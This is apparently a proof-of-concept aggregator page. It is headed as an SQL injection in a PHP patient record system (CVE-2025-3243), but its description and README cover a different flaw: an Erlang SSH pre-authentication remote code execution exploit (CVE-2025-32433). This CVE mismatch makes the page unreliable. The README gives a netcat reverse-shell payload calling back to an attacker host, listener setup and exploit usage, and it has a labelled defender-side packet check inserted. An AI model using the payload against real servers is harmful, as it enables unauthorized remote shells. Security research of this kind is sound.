CVE-2025-3243 PoC — code-projects Patient Record Management System dental_form.php sql injection

Associated Vulnerability
Title: code-projects Patient Record Management System dental_form.php sql injection (CVE-2025-3243)
Description: A vulnerability was found in code-projects Patient Record Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dental_form.php. The manipulation of the argument itr_no/dental_no leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
Description
A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets.
Readme
# CVE-2025-32433 Erlang SSH Library Exploit

A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.
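
A defender-side check for the condition described above, as an added example that is not part of the original README or the exploit script: SSH connection-protocol messages (types 80 to 127, which include `SSH_MSG_CHANNEL_OPEN` = 90 and `SSH_MSG_CHANNEL_REQUEST` = 98) are only valid after authentication, so one appearing in cleartext before `SSH_MSG_NEWKEYS` is a protocol violation worth alerting on. The function names, the reassembled client-to-server byte stream as input, and the zero-filled sample packets are assumptions constructed for illustration.

```python
import struct

SSH_MSG_NEWKEYS = 21  # RFC 4253: client traffic is encrypted after this
NAMES = {90: "SSH_MSG_CHANNEL_OPEN", 98: "SSH_MSG_CHANNEL_REQUEST"}


def preauth_connection_msgs(stream: bytes) -> list:
    """List connection-protocol messages (types 80-127) sent in cleartext,
    i.e. before SSH_MSG_NEWKEYS and therefore before authentication."""
    nl = stream.find(b"\n")
    if not stream.startswith(b"SSH-") or nl < 0:
        return []  # no identification line: not an SSH client stream
    pos, hits = nl + 1, []
    while pos + 6 <= len(stream):
        # Binary packet: uint32 packet_length, byte padding_length, payload
        pkt_len, pad_len = struct.unpack_from(">IB", stream, pos)
        if not 2 <= pkt_len <= 35000 or pad_len > pkt_len - 2:
            break  # not a plausible cleartext packet
        if pos + 4 + pkt_len > len(stream):
            break  # truncated capture
        msg_type = stream[pos + 5]
        if msg_type == SSH_MSG_NEWKEYS:
            break  # everything after this is encrypted and opaque
        if 80 <= msg_type <= 127:
            hits.append(NAMES.get(msg_type, "type %d" % msg_type))
        pos += 4 + pkt_len
    return hits


def _packet(payload: bytes) -> bytes:
    """Frame a payload as an unencrypted SSH packet (for constructed samples)."""
    pad = 8 - (5 + len(payload)) % 8
    if pad < 4:
        pad += 8
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + bytes(pad)


# Constructed samples: message bodies are zero-filled placeholders.
BANNER = b"SSH-2.0-sample_client\r\n"
KEXINIT = _packet(b"\x14" + bytes(16))
NORMAL = BANNER + KEXINIT + _packet(b"\x1e" + bytes(8)) + _packet(b"\x15") + bytes(64)
SUSPICIOUS = BANNER + KEXINIT + _packet(b"\x5a" + bytes(8)) + _packet(b"\x62" + bytes(8))

if __name__ == "__main__":
    print("normal:    ", preauth_connection_msgs(NORMAL))
    print("suspicious:", preauth_connection_msgs(SUSPICIOUS))
```

The check only covers the cleartext phase of a session; once `SSH_MSG_NEWKEYS` has been sent, message types are no longer visible on the wire.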

---

## Features

- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
  - Command‑line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
  - Built‑in help and usage via `argparse`
  - Erlang‑style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  - Clean function decomposition and status logging for each stage

---

## Prerequisites

- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)

---

## Usage

1. **Start your listener** on the attack box:

   ```sh
   nc -lvnp 4444
   ```

2. **Run the exploit**:

   ```sh
   python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
   ```

3. **Wait for the shell** to connect back to your listener.


### Help Menu

```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```

---

## Credits

- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey

---

## Disclaimer

Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

File Snapshot

[4.0K] /data/pocs/9e953763abdbe7fc368f093ac710e536acc566a1
├── [4.1K] CVE-2025-3243.py
└── [2.0K] README.md

0 directories, 2 files